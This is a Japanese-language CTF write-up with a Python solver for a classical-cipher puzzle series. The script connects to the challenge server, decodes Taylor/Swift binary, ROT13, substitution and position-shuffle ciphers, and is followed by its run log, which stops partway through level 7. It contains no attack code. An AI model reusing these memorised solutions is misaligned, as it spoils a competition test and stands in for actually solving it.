Give me text: ZYXWDCBA ZYXWDCBA encrypted is SwiftTaylorSwiftTaylorSwift SwiftTaylorSwiftTaylorTaylor SwiftTaylorSwiftSwiftTaylor SwiftTaylorTaylorSwiftSwift SwiftTaylorSwiftSwiftSwift SwiftTaylorTaylorSwiftTaylor SwiftSwiftTaylorTaylorTaylor SwiftSwiftTaylorTaylorSwift
レベル0の復号のみ行い、数値にしてみる。
21, 20, 22, 19, 23, 18, 24, 25
Give me text: DCBA DCBA encrypted is SwiftSwiftTaylorTaylorSwift SwiftSwiftTaylorTaylorTaylor SwiftTaylorSwiftSwiftSwift SwiftTaylorSwiftSwiftTaylor
レベル0の復号のみ行い、数値にしてみる。
25, 24, 23, 22
Give me text: WXYZ WXYZ encrypted is SwiftTaylorTaylorSwiftTaylor SwiftTaylorTaylorSwiftSwift SwiftTaylorSwiftTaylorTaylor SwiftTaylorSwiftTaylorSwift
レベル0の復号のみ行い、数値にしてみる。
18, 19, 20, 21
Give me text: ABCDEFGHIJKLMNOPQRSTUVWXYZ ABCDEFGHIJKLMNOPQRSTUVWXYZ encrypted is SwiftTaylorSwiftSwiftTaylor TaylorTaylorSwiftTaylorTaylor TaylorSwiftSwiftTaylorTaylor SwiftTaylorSwiftTaylorTaylor SwiftTaylorSwiftSwiftSwift TaylorTaylorTaylorSwiftSwift TaylorTaylorSwiftTaylorSwift TaylorSwiftTaylorSwiftSwift TaylorSwiftSwiftTaylorSwift SwiftTaylorTaylorSwiftSwift SwiftTaylorSwiftTaylorSwift SwiftSwiftTaylorTaylorTaylor TaylorTaylorTaylorSwiftTaylor TaylorTaylorSwiftSwiftTaylor TaylorSwiftTaylorSwiftTaylor TaylorSwiftSwiftSwiftTaylor SwiftTaylorTaylorSwiftTaylor SwiftSwiftTaylorTaylorSwift TaylorTaylorTaylorTaylorSwift TaylorTaylorSwiftSwiftSwift TaylorSwiftTaylorTaylorSwift TaylorSwiftSwiftSwiftSwift SwiftTaylorTaylorTaylorSwift TaylorTaylorTaylorTaylorTaylor TaylorSwiftTaylorTaylorTaylor SwiftTaylorTaylorTaylorTaylor
レベル0の復号のみ行い、数値にしてみる。
22, 4, 12, 20, 23, 3, 5, 11, 13, 19, 21, 24, 2, 6, 10, 14, 18, 25, 1, 7, 9, 15, 17, 0, 8, 16
Give me text: ABCDEFGH ABCDEFGH encrypted is SwiftTaylorSwiftSwiftTaylor SwiftTaylorSwiftSwiftSwift TaylorTaylorTaylorSwiftSwift SwiftSwiftTaylorTaylorTaylor TaylorTaylorTaylorSwiftTaylor SwiftSwiftTaylorTaylorSwift TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorTaylorTaylor
レベル0の復号のみ行い、数値にしてみる。
22, 23, 3, 24, 2, 25, 1, 0
各文字は平文から暗号文になるときに-4シフトして対応付けされ、さらに長さにより順序が変わる。12文字まで順序を確認し、対応する長さにより、対応する順序に変わることを前提に復号する。
AB encrypted is SwiftTaylorSwiftSwiftTaylor SwiftTaylorSwiftSwiftSwift 22, 23 ABC encrypted is SwiftTaylorSwiftSwiftTaylor SwiftTaylorSwiftSwiftSwift SwiftSwiftTaylorTaylorTaylor 22, 23, 24 ABCDE encrypted is SwiftTaylorSwiftSwiftTaylor SwiftTaylorSwiftSwiftSwift SwiftSwiftTaylorTaylorTaylor SwiftSwiftTaylorTaylorSwift TaylorTaylorTaylorTaylorTaylor 22, 23, 24, 25, 0 ABCDEF encrypted is SwiftTaylorSwiftSwiftTaylor SwiftTaylorSwiftSwiftSwift SwiftSwiftTaylorTaylorTaylor SwiftSwiftTaylorTaylorSwift TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorTaylorTaylor 22, 23, 24, 25, 1, 0 ABCDEFG encrypted is SwiftTaylorSwiftSwiftTaylor SwiftTaylorSwiftSwiftSwift SwiftSwiftTaylorTaylorTaylor TaylorTaylorTaylorSwiftTaylor SwiftSwiftTaylorTaylorSwift TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorTaylorTaylor 22, 23, 24, 2, 25, 1, 0 ABCDEFGH encrypted is SwiftTaylorSwiftSwiftTaylor SwiftTaylorSwiftSwiftSwift TaylorTaylorTaylorSwiftSwift SwiftSwiftTaylorTaylorTaylor TaylorTaylorTaylorSwiftTaylor SwiftSwiftTaylorTaylorSwift TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorTaylorTaylor 22, 23, 3, 24, 2, 25, 1, 0 ABCDEFGHI encrypted is SwiftTaylorSwiftSwiftTaylor TaylorTaylorSwiftTaylorTaylor SwiftTaylorSwiftSwiftSwift TaylorTaylorTaylorSwiftSwift SwiftSwiftTaylorTaylorTaylor TaylorTaylorTaylorSwiftTaylor SwiftSwiftTaylorTaylorSwift TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorTaylorTaylor 22, 4, 23, 3, 24, 2, 25, 1, 0 ABCDEFGHIJ encrypted is SwiftTaylorSwiftSwiftTaylor TaylorTaylorSwiftTaylorTaylor SwiftTaylorSwiftSwiftSwift TaylorTaylorTaylorSwiftSwift TaylorTaylorSwiftTaylorSwift SwiftSwiftTaylorTaylorTaylor TaylorTaylorTaylorSwiftTaylor SwiftSwiftTaylorTaylorSwift TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorTaylorTaylor 22, 4, 23, 3, 5, 24, 2, 25, 1, 0 ABCDEFGHIJK encrypted is SwiftTaylorSwiftSwiftTaylor TaylorTaylorSwiftTaylorTaylor SwiftTaylorSwiftSwiftSwift TaylorTaylorTaylorSwiftSwift TaylorTaylorSwiftTaylorSwift SwiftSwiftTaylorTaylorTaylor TaylorTaylorTaylorSwiftTaylor TaylorTaylorSwiftSwiftTaylor SwiftSwiftTaylorTaylorSwift TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorTaylorTaylor 22, 4, 23, 3, 5, 24, 2, 6, 25, 1, 0 ABCDEFGHIJKL encrypted is SwiftTaylorSwiftSwiftTaylor TaylorTaylorSwiftTaylorTaylor SwiftTaylorSwiftSwiftSwift TaylorTaylorTaylorSwiftSwift TaylorTaylorSwiftTaylorSwift SwiftSwiftTaylorTaylorTaylor TaylorTaylorTaylorSwiftTaylor TaylorTaylorSwiftSwiftTaylor SwiftSwiftTaylorTaylorSwift TaylorTaylorTaylorTaylorSwift TaylorTaylorSwiftSwiftSwift TaylorTaylorTaylorTaylorTaylor 22, 4, 23, 3, 5, 24, 2, 6, 25, 1, 7, 0 ABCDEFGHIJKLM encrypted is SwiftTaylorSwiftSwiftTaylor TaylorTaylorSwiftTaylorTaylor SwiftTaylorSwiftSwiftSwift TaylorTaylorTaylorSwiftSwift TaylorTaylorSwiftTaylorSwift SwiftSwiftTaylorTaylorTaylor TaylorTaylorTaylorSwiftTaylor TaylorTaylorSwiftSwiftTaylor SwiftSwiftTaylorTaylorSwift TaylorTaylorTaylorTaylorSwift TaylorTaylorSwiftSwiftSwift TaylorTaylorTaylorTaylorTaylor TaylorSwiftTaylorTaylorTaylor 22, 4, 23, 3, 5, 24, 2, 6, 25, 1, 7, 0, 8 ABCDEFGHIJKLMN encrypted is SwiftTaylorSwiftSwiftTaylor TaylorTaylorSwiftTaylorTaylor SwiftTaylorSwiftSwiftSwift TaylorTaylorTaylorSwiftSwift TaylorTaylorSwiftTaylorSwift SwiftSwiftTaylorTaylorTaylor TaylorTaylorTaylorSwiftTaylor TaylorTaylorSwiftSwiftTaylor SwiftSwiftTaylorTaylorSwift TaylorTaylorTaylorTaylorSwift TaylorTaylorSwiftSwiftSwift TaylorSwiftTaylorTaylorSwift TaylorTaylorTaylorTaylorTaylor TaylorSwiftTaylorTaylorTaylor 22, 4, 23, 3, 5, 24, 2, 6, 25, 1, 7, 9, 0, 8
#!/usr/bin/env python3 import socket from string import * import codecs def recvuntil(s, tail): data = b'' while True: if tail in data: return data.decode() data += s.recv(1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('chal.tuctf.com', 30007)) #### Level 0 #### data = recvuntil(s, b'? ') print(data + '0') s.sendall(b'0\n') data = recvuntil(s, b':\n').rstrip() print(data) text = 'ABCD' print(text) s.sendall(text.encode() + b'\n') for _ in range(2): data = recvuntil(s, b'\n').rstrip() print(data) for i in range(30): data = recvuntil(s, b'\n').rstrip() print(data) ct = data.split(' ')[1:] pt = '' for c in ct: code = c.replace('Taylor', '0').replace('Swift', '1') index = int(code, 2) pt += ascii_uppercase[index] print(pt) s.sendall(pt.encode() + b'\n') for _ in range(3): data = recvuntil(s, b'\n').rstrip() print(data) #### Level 1 #### data = recvuntil(s, b'? ') print(data + '1') s.sendall(b'1\n') data = recvuntil(s, b':\n').rstrip() print(data) text = 'ABCD' print(text) s.sendall(text.encode() + b'\n') for _ in range(2): data = recvuntil(s, b'\n').rstrip() print(data) for i in range(30): data = recvuntil(s, b'\n').rstrip() print(data) ct = data.split(' ')[1:] pt = '' for c in ct: code = c.replace('Taylor', '1').replace('Swift', '0') index = int(code, 2) pt += ascii_uppercase[index] print(pt) s.sendall(pt.encode() + b'\n') for _ in range(3): data = recvuntil(s, b'\n').rstrip() print(data) #### Level 2 #### data = recvuntil(s, b'? ') print(data + '2') s.sendall(b'2\n') data = recvuntil(s, b':\n').rstrip() print(data) text = 'ZYXW' print(text) s.sendall(text.encode() + b'\n') for _ in range(2): data = recvuntil(s, b'\n').rstrip() print(data) for i in range(30): data = recvuntil(s, b'\n').rstrip() print(data) ct = data.split(' ')[1:] pt = '' for c in ct: code = c.replace('Taylor', '0').replace('Swift', '1') index = int(code, 2) pt += ascii_uppercase[index] pt = codecs.decode(pt, 'rot-13') print(pt) s.sendall(pt.encode() + b'\n') for _ in range(3): data = recvuntil(s, b'\n').rstrip() print(data) #### Level 3 #### data = recvuntil(s, b'? ') print(data + '3') s.sendall(b'3\n') data = recvuntil(s, b':\n').rstrip() print(data) text = 'ZYXW' print(text) s.sendall(text.encode() + b'\n') for _ in range(2): data = recvuntil(s, b'\n').rstrip() print(data) for i in range(30): data = recvuntil(s, b'\n').rstrip() print(data) ct = data.split(' ')[1:] pt = '' for c in ct: code = c.replace('Taylor', '0').replace('Swift', '1') index = 25 - int(code, 2) pt += ascii_uppercase[index] print(pt) s.sendall(pt.encode() + b'\n') for _ in range(3): data = recvuntil(s, b'\n').rstrip() print(data) #### Level 4 #### data = recvuntil(s, b'? ') print(data + '4') s.sendall(b'4\n') data = recvuntil(s, b':\n').rstrip() print(data) text = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' print(text) s.sendall(text.encode() + b'\n') for _ in range(2): data = recvuntil(s, b'\n').rstrip() print(data) for i in range(30): data = recvuntil(s, b'\n').rstrip() print(data) ct = data.split(' ')[1:] codes = [] for c in ct: code = c.replace('Taylor', '0').replace('Swift', '1') index = int(code, 2) codes.append(text[index]) l = len(codes) indexes = [] for i in range(0, l, 4): indexes.append(i) for i in range(1, l, 2): indexes.append(i) for i in range(2, l, 4): indexes.append(i) pt = '' for i in range(l): index = indexes.index(i) pt += codes[index] print(pt) s.sendall(pt.encode() + b'\n') for _ in range(3): data = recvuntil(s, b'\n').rstrip() print(data) #### Level 5 #### data = recvuntil(s, b'? ') print(data + '5') s.sendall(b'5\n') data = recvuntil(s, b':\n').rstrip() print(data) text = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' print(text) s.sendall(text.encode() + b'\n') data = recvuntil(s, b'\n').rstrip() print(data) text_ct = data.split(' ')[3:] dic = {} for p, c in zip(text, text_ct): dic[c] = p data = recvuntil(s, b'\n').rstrip() print(data) for i in range(30): data = recvuntil(s, b'\n').rstrip() print(data) ct = data.split(' ')[1:] pt = '' for c in ct: pt += dic[c] print(pt) s.sendall(pt.encode() + b'\n') for _ in range(3): data = recvuntil(s, b'\n').rstrip() print(data) #### Level 6 #### data = recvuntil(s, b'? ') print(data + '6') s.sendall(b'6\n') data = recvuntil(s, b':\n').rstrip() print(data) text = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' print(text) s.sendall(text.encode() + b'\n') data = recvuntil(s, b'\n').rstrip() print(data) text_ct = data.split(' ')[3:] dic = {} for p, c in zip(text, text_ct): dic[c] = p data = recvuntil(s, b'\n').rstrip() print(data) for i in range(30): data = recvuntil(s, b'\n').rstrip() print(data) ct = data.split(' ')[1:] pt = '' for c in ct: pt += dic[c] print(pt) s.sendall(pt.encode() + b'\n') for _ in range(3): data = recvuntil(s, b'\n').rstrip() print(data) #### Level 7 #### data = recvuntil(s, b'? ') print(data + '7') s.sendall(b'7\n') data = recvuntil(s, b':\n').rstrip() print(data) text = 'ABCDEFGHIJKLMN' print(text) s.sendall(text.encode() + b'\n') for _ in range(2): data = recvuntil(s, b'\n').rstrip() print(data) for i in range(30): data = recvuntil(s, b'\n').rstrip() print(data) ct = data.split(' ')[1:] codes = [] for c in ct: code = c.replace('Taylor', '0').replace('Swift', '1') index = (int(code, 2) + 4) % 26 codes.append(ascii_uppercase[index]) l = len(codes) if l > 14: print('Not supported') exit(1) pt = '' for i in range(l): if l < 6: pt += codes[i] elif l == 6: order = [0, 1, 2, 3, 5, 4] pt += codes[order.index(i)] elif l == 7: order = [0, 1, 2, 6, 3, 5, 4] pt += codes[order.index(i)] elif l == 8: order = [0, 1, 7, 2, 6, 3, 5, 4] pt += codes[order.index(i)] elif l == 9: order = [0, 8, 1, 7, 2, 6, 3, 5, 4] pt += codes[order.index(i)] elif l == 10: order = [0, 8, 1, 7, 9, 2, 6, 3, 5, 4] pt += codes[order.index(i)] elif l == 11: order = [0, 8, 1, 7, 9, 2, 6, 10, 3, 5, 4] pt += codes[order.index(i)] elif l == 12: order = [0, 8, 1, 7, 9, 2, 6, 10, 3, 5, 11, 4] pt += codes[order.index(i)] elif l == 13: order = [0, 8, 1, 7, 9, 2, 6, 10, 3, 5, 11, 4, 12] pt += codes[order.index(i)] elif l == 14: order = [0, 8, 1, 7, 9, 2, 6, 10, 3, 5, 11, 13, 4, 12] pt += codes[order.index(i)] print(pt) s.sendall(pt.encode() + b'\n') for _ in range(3): data = recvuntil(s, b'\n').rstrip() print(data) for _ in range(7): data = recvuntil(s, b'\n').rstrip() print(data)
実行結果は以下の通り。
Welcome to Never Ending Crypto (Taylor's Version). Hope you're ready for the new and improved version of this annual challenge. You can complete these levels in any order, but I recommend you do 6 and 7 last, as they build on previous levels. 0: Shake It Off Incomplete 1: Mirrorball Incomplete 2: Nothing New Incomplete 3: Change Incomplete 4: Ivy Incomplete 5: False God Incomplete 6: Hits Different Incomplete 7: End Game Incomplete What level? 0 Level 0: Shake It Off Haters gonna hate Give me text: ABCD ABCD encrypted is TaylorTaylorTaylorTaylorTaylor TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorSwiftTaylor TaylorTaylorTaylorSwiftSwift Decrypt TaylorTaylorSwiftTaylorTaylor TaylorSwiftSwiftTaylorTaylor TaylorTaylorSwiftTaylorTaylor SwiftTaylorTaylorTaylorSwift TaylorTaylorSwiftSwiftTaylor TaylorTaylorSwiftTaylorTaylor TaylorSwiftSwiftTaylorSwift SwiftTaylorTaylorSwiftSwift EMERGENT Ayyyyy : : Decrypt TaylorTaylorSwiftTaylorTaylor SwiftTaylorTaylorTaylorSwift TaylorSwiftTaylorSwiftSwift TaylorTaylorSwiftTaylorTaylor TaylorSwiftSwiftTaylorSwift TaylorSwiftSwiftTaylorTaylor TaylorTaylorSwiftTaylorTaylor SwiftSwiftTaylorTaylorTaylor TaylorTaylorSwiftTaylorTaylor SwiftTaylorTaylorTaylorSwift ERLENMEYER Ayyyyy Decrypt TaylorSwiftTaylorSwiftSwift TaylorSwiftSwiftSwiftTaylor SwiftTaylorSwiftTaylorTaylor SwiftTaylorTaylorSwiftTaylor TaylorTaylorSwiftTaylorTaylor SwiftTaylorSwiftSwiftTaylor TaylorSwiftSwiftSwiftTaylor SwiftTaylorTaylorTaylorSwift SwiftTaylorTaylorSwiftSwift LOUSEWORT Yeah! You do that Crypto! Congratulations! You beat Level 0! 0: Shake It Off Solved 1: Mirrorball Incomplete 2: Nothing New Incomplete 3: Change Incomplete 4: Ivy Incomplete 5: False God Incomplete 6: Hits Different Incomplete 7: End Game Incomplete What level? 1 Level 1: Mirrorball Give me text: ABCD ABCD encrypted is SwiftSwiftSwiftSwiftSwift SwiftSwiftSwiftSwiftTaylor SwiftSwiftSwiftTaylorSwift SwiftSwiftSwiftTaylorTaylor Decrypt SwiftSwiftSwiftTaylorSwift SwiftSwiftTaylorTaylorTaylor SwiftTaylorSwiftSwiftSwift SwiftTaylorTaylorSwiftTaylor SwiftSwiftTaylorSwiftSwift TaylorSwiftSwiftTaylorSwift SwiftSwiftTaylorSwiftSwift CHINESE Yeah! You do that Crypto! : : Decrypt SwiftSwiftSwiftSwiftTaylor TaylorSwiftTaylorSwiftSwift SwiftSwiftSwiftTaylorSwift SwiftSwiftTaylorTaylorTaylor SwiftSwiftTaylorSwiftSwift SwiftTaylorTaylorSwiftTaylor TaylorSwiftTaylorTaylorSwift SwiftSwiftSwiftSwiftSwift SwiftTaylorSwiftTaylorTaylor SwiftSwiftSwiftTaylorTaylor BUCHENWALD Yeah! You do that Crypto! Decrypt SwiftTaylorTaylorTaylorTaylor TaylorSwiftSwiftSwiftTaylor SwiftTaylorTaylorTaylorSwift SwiftTaylorSwiftTaylorTaylor TaylorSwiftTaylorSwiftSwift TaylorSwiftSwiftTaylorSwift SwiftTaylorSwiftSwiftSwift SwiftTaylorTaylorTaylorSwift SwiftTaylorTaylorSwiftTaylor PROLUSION Whoop whoop! Congratulations! You beat Level 1! 0: Shake It Off Solved 1: Mirrorball Solved 2: Nothing New Incomplete 3: Change Incomplete 4: Ivy Incomplete 5: False God Incomplete 6: Hits Different Incomplete 7: End Game Incomplete What level? 2 Level 2: Nothing New Give me text: ZYXW ZYXW encrypted is TaylorSwiftSwiftTaylorTaylor TaylorSwiftTaylorSwiftSwift TaylorSwiftTaylorSwiftTaylor TaylorSwiftTaylorTaylorSwift Decrypt TaylorSwiftSwiftTaylorSwift SwiftTaylorTaylorTaylorTaylor SwiftTaylorTaylorTaylorTaylor SwiftTaylorSwiftTaylorSwift TaylorTaylorSwiftSwiftTaylor SwiftTaylorSwiftTaylorSwift TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorTaylorTaylor ADDITION Nice job! : : Decrypt TaylorSwiftSwiftSwiftTaylor SwiftTaylorSwiftTaylorSwift TaylorTaylorTaylorTaylorSwift TaylorTaylorSwiftSwiftTaylor SwiftTaylorSwiftTaylorSwift TaylorTaylorSwiftSwiftTaylor SwiftTaylorTaylorTaylorSwift BIOTITE Yeah! You do that Crypto! Decrypt TaylorTaylorSwiftSwiftTaylor SwiftTaylorTaylorTaylorSwift TaylorTaylorSwiftTaylorTaylor SwiftSwiftTaylorTaylorSwift SwiftTaylorSwiftTaylorSwift TaylorTaylorTaylorTaylorTaylor TaylorTaylorTaylorTaylorSwift SwiftSwiftTaylorTaylorTaylor TaylorTaylorTaylorTaylorSwift SwiftTaylorTaylorSwiftSwift TaylorSwiftTaylorSwiftSwift TERMINOLOGY Way to go! Congratulations! You beat Level 2! 0: Shake It Off Solved 1: Mirrorball Solved 2: Nothing New Solved 3: Change Incomplete 4: Ivy Incomplete 5: False God Incomplete 6: Hits Different Incomplete 7: End Game Incomplete What level? 3 Level 3: Change Give me text: ZYXW ZYXW encrypted is TaylorTaylorTaylorTaylorTaylor TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorSwiftTaylor TaylorTaylorTaylorSwiftSwift Decrypt TaylorTaylorSwiftSwiftSwift TaylorSwiftTaylorSwiftTaylor SwiftTaylorTaylorTaylorSwift TaylorSwiftTaylorTaylorTaylor TaylorSwiftTaylorSwiftSwift SwiftTaylorTaylorSwiftSwift TaylorTaylorTaylorTaylorSwift TaylorSwiftTaylorTaylorTaylor SwiftSwiftTaylorTaylorSwift SPIROGYRA Nice job! : : Decrypt SwiftTaylorTaylorTaylorTaylor SwiftSwiftTaylorTaylorSwift SwiftSwiftTaylorTaylorTaylor TaylorSwiftSwiftSwiftTaylor TaylorSwiftTaylorSwiftSwift TaylorSwiftSwiftTaylorTaylor TaylorTaylorSwiftSwiftSwift TaylorSwiftSwiftSwiftSwift TaylorTaylorTaylorTaylorSwift JABLONSKY Yeah! You do that Crypto! Decrypt SwiftTaylorSwiftTaylorSwift TaylorTaylorTaylorSwiftTaylor TaylorSwiftTaylorSwiftTaylor TaylorSwiftTaylorSwiftSwift TaylorSwiftSwiftTaylorTaylor SwiftTaylorSwiftTaylorSwift TaylorSwiftSwiftTaylorTaylor TaylorTaylorSwiftSwiftTaylor EXPONENT Whoop whoop! Congratulations! You beat Level 3! 0: Shake It Off Solved 1: Mirrorball Solved 2: Nothing New Solved 3: Change Solved 4: Ivy Incomplete 5: False God Incomplete 6: Hits Different Incomplete 7: End Game Incomplete What level? 4 Level 4: Ivy Give me text: ABCDEFGHIJKLMNOPQRSTUVWXYZ ABCDEFGHIJKLMNOPQRSTUVWXYZ encrypted is TaylorTaylorTaylorTaylorTaylor TaylorTaylorSwiftTaylorTaylor TaylorSwiftTaylorTaylorTaylor TaylorSwiftSwiftTaylorTaylor SwiftTaylorTaylorTaylorTaylor SwiftTaylorSwiftTaylorTaylor SwiftSwiftTaylorTaylorTaylor TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorSwiftSwift TaylorTaylorSwiftTaylorSwift TaylorTaylorSwiftSwiftSwift TaylorSwiftTaylorTaylorSwift TaylorSwiftTaylorSwiftSwift TaylorSwiftSwiftTaylorSwift TaylorSwiftSwiftSwiftSwift SwiftTaylorTaylorTaylorSwift SwiftTaylorTaylorSwiftSwift SwiftTaylorSwiftTaylorSwift SwiftTaylorSwiftSwiftSwift SwiftSwiftTaylorTaylorSwift TaylorTaylorTaylorSwiftTaylor TaylorTaylorSwiftSwiftTaylor TaylorSwiftTaylorSwiftTaylor TaylorSwiftSwiftSwiftTaylor SwiftTaylorTaylorSwiftTaylor SwiftTaylorSwiftSwiftTaylor Decrypt TaylorSwiftSwiftSwiftSwift TaylorTaylorTaylorTaylorTaylor TaylorTaylorSwiftTaylorTaylor TaylorTaylorTaylorSwiftTaylor SwiftTaylorTaylorTaylorSwift TaylorTaylorTaylorSwiftTaylor SwiftSwiftTaylorTaylorTaylor PECCARY That was adequate. : : Decrypt TaylorTaylorTaylorSwiftTaylor TaylorTaylorSwiftTaylorTaylor TaylorTaylorTaylorTaylorTaylor TaylorTaylorTaylorSwiftSwift SwiftTaylorTaylorTaylorSwift TaylorSwiftTaylorSwiftSwift TaylorTaylorTaylorTaylorTaylor CALDERA Whoop whoop! Decrypt SwiftTaylorTaylorSwiftSwift TaylorTaylorTaylorSwiftSwift TaylorTaylorSwiftTaylorTaylor SwiftTaylorTaylorTaylorSwift SwiftTaylorTaylorTaylorSwift TaylorSwiftSwiftSwiftSwift TaylorTaylorTaylorTaylorTaylor TaylorSwiftSwiftSwiftTaylor TEARDROP Whoop whoop! Congratulations! You beat Level 4! 0: Shake It Off Solved 1: Mirrorball Solved 2: Nothing New Solved 3: Change Solved 4: Ivy Solved 5: False God Incomplete 6: Hits Different Incomplete 7: End Game Incomplete What level? 5 Level 5: False God Give me text: ABCDEFGHIJKLMNOPQRSTUVWXYZ ABCDEFGHIJKLMNOPQRSTUVWXYZ encrypted is SwiftTaylorTaylorSwiftSwift TaylorTaylorTaylorTaylorTaylor SwiftSwiftTaylorTaylorTaylor TaylorSwiftTaylorSwiftSwift TaylorSwiftSwiftSwiftTaylor SwiftTaylorTaylorTaylorSwift SwiftTaylorTaylorSwiftTaylor SwiftTaylorSwiftSwiftTaylor TaylorSwiftTaylorTaylorTaylor TaylorTaylorSwiftTaylorSwift TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorSwiftTaylor TaylorTaylorTaylorSwiftSwift TaylorTaylorSwiftTaylorTaylor TaylorTaylorSwiftSwiftTaylor TaylorTaylorSwiftSwiftSwift TaylorSwiftTaylorTaylorSwift TaylorSwiftTaylorSwiftTaylor TaylorSwiftSwiftTaylorTaylor TaylorSwiftSwiftTaylorSwift TaylorSwiftSwiftSwiftSwift SwiftTaylorTaylorTaylorTaylor SwiftTaylorSwiftTaylorTaylor SwiftTaylorSwiftTaylorSwift SwiftTaylorSwiftSwiftSwift SwiftSwiftTaylorTaylorSwift Decrypt TaylorTaylorSwiftSwiftSwift TaylorTaylorSwiftSwiftTaylor TaylorSwiftSwiftTaylorTaylor TaylorSwiftSwiftTaylorSwift TaylorTaylorSwiftSwiftTaylor TaylorSwiftTaylorSwiftTaylor TaylorSwiftTaylorSwiftSwift TaylorSwiftSwiftSwiftTaylor TaylorSwiftTaylorSwiftTaylor POSTORDER Way to go! : : Decrypt TaylorTaylorTaylorTaylorTaylor TaylorSwiftSwiftSwiftTaylor TaylorTaylorSwiftTaylorTaylor SwiftTaylorTaylorSwiftTaylor SwiftTaylorTaylorSwiftSwift TaylorTaylorTaylorSwiftTaylor TaylorSwiftTaylorTaylorTaylor BENGALI Yeah! You do that Crypto! Decrypt SwiftTaylorSwiftTaylorTaylor TaylorTaylorSwiftSwiftTaylor TaylorSwiftTaylorSwiftTaylor TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorTaylorTaylor TaylorSwiftSwiftSwiftTaylor TaylorTaylorSwiftTaylorTaylor SwiftSwiftTaylorTaylorTaylor SwiftTaylorSwiftSwiftTaylor WORKBENCH Ayyyyy Congratulations! You beat Level 5! 0: Shake It Off Solved 1: Mirrorball Solved 2: Nothing New Solved 3: Change Solved 4: Ivy Solved 5: False God Solved 6: Hits Different Incomplete 7: End Game Incomplete What level? 6 Level 6: Hits Different Give me text: ABCDEFGHIJKLMNOPQRSTUVWXYZ ABCDEFGHIJKLMNOPQRSTUVWXYZ encrypted is TaylorSwiftSwiftTaylorSwift TaylorSwiftTaylorTaylorSwift SwiftTaylorSwiftSwiftSwift SwiftSwiftTaylorSwiftTaylor TaylorSwiftSwiftTaylorTaylor SwiftSwiftSwiftSwiftSwift TaylorTaylorSwiftSwiftSwift SwiftTaylorSwiftTaylorTaylor SwiftTaylorTaylorTaylorSwift TaylorSwiftSwiftSwiftTaylor SwiftSwiftSwiftSwiftTaylor SwiftSwiftSwiftTaylorSwift SwiftSwiftSwiftTaylorTaylor SwiftSwiftTaylorSwiftSwift SwiftSwiftTaylorTaylorSwift SwiftSwiftTaylorTaylorTaylor SwiftTaylorSwiftSwiftTaylor SwiftTaylorSwiftTaylorSwift SwiftTaylorTaylorSwiftSwift SwiftTaylorTaylorSwiftTaylor SwiftTaylorTaylorTaylorTaylor TaylorSwiftSwiftSwiftSwift TaylorSwiftTaylorSwiftSwift TaylorSwiftTaylorSwiftTaylor TaylorSwiftTaylorTaylorTaylor TaylorTaylorSwiftSwiftTaylor Decrypt SwiftTaylorTaylorSwiftTaylor SwiftTaylorSwiftTaylorSwift TaylorSwiftSwiftTaylorSwift SwiftSwiftTaylorSwiftSwift SwiftTaylorTaylorSwiftSwift TaylorSwiftSwiftTaylorTaylor SwiftSwiftTaylorTaylorTaylor SwiftTaylorTaylorSwiftTaylor TRANSEPT Nice job! : : Decrypt TaylorSwiftSwiftTaylorSwift SwiftSwiftTaylorSwiftTaylor SwiftSwiftSwiftTaylorTaylor SwiftTaylorTaylorTaylorSwift SwiftTaylorTaylorSwiftTaylor SwiftTaylorTaylorSwiftTaylor TaylorSwiftSwiftTaylorSwift SwiftSwiftTaylorSwiftSwift SwiftTaylorSwiftSwiftSwift TaylorSwiftSwiftTaylorTaylor ADMITTANCE Whoop whoop! Decrypt SwiftTaylorTaylorSwiftTaylor SwiftTaylorSwiftTaylorSwift TaylorSwiftSwiftTaylorSwift SwiftSwiftSwiftTaylorTaylor SwiftSwiftTaylorTaylorTaylor SwiftSwiftSwiftTaylorSwift TaylorSwiftSwiftTaylorTaylor TRAMPLE Yeah! You do that Crypto! Congratulations! You beat Level 6! 0: Shake It Off Solved 1: Mirrorball Solved 2: Nothing New Solved 3: Change Solved 4: Ivy Solved 5: False God Solved 6: Hits Different Solved 7: End Game Incomplete What level? 7 Level 7: End Game Give me text: ABCDEFGHIJKLMN ABCDEFGHIJKLMN encrypted is SwiftTaylorSwiftSwiftTaylor TaylorTaylorSwiftTaylorTaylor SwiftTaylorSwiftSwiftSwift TaylorTaylorTaylorSwiftSwift TaylorTaylorSwiftTaylorSwift SwiftSwiftTaylorTaylorTaylor TaylorTaylorTaylorSwiftTaylor TaylorTaylorSwiftSwiftTaylor SwiftSwiftTaylorTaylorSwift TaylorTaylorTaylorTaylorSwift TaylorTaylorSwiftSwiftSwift TaylorSwiftTaylorTaylorSwift TaylorTaylorTaylorTaylorTaylor TaylorSwiftTaylorTaylorTaylor Decrypt SwiftTaylorSwiftSwiftSwift TaylorTaylorSwiftTaylorTaylor TaylorTaylorTaylorTaylorTaylor TaylorTaylorTaylorSwiftSwift TaylorSwiftTaylorTaylorSwift TaylorTaylorSwiftSwiftSwift SwiftSwiftTaylorTaylorTaylor TaylorTaylorTaylorSwiftTaylor TaylorTaylorSwiftSwiftSwift SwiftTaylorSwiftSwiftTaylor SwiftTaylorSwiftTaylorTaylor BELLYACHING Whoop whoop! Decrypt SwiftTaylorTaylorTaylorSwift TaylorSwiftTaylorSwiftTaylor TaylorTaylorSwiftSwiftSwift TaylorTaylorTaylorTaylorTaylor TaylorSwiftSwiftSwiftSwift TaylorTaylorTaylorSwiftTaylor SwiftTaylorSwiftSwiftTaylor VOLTAGE That was adequate. : : Decrypt SwiftSwiftTaylorTaylorTaylor TaylorSwiftSwiftSwiftSwift TaylorSwiftTaylorSwiftTaylor SwiftTaylorSwiftSwiftTaylor TaylorSwiftTaylorSwiftTaylor TaylorSwiftTaylorTaylorTaylor SwiftSwiftTaylorTaylorSwift 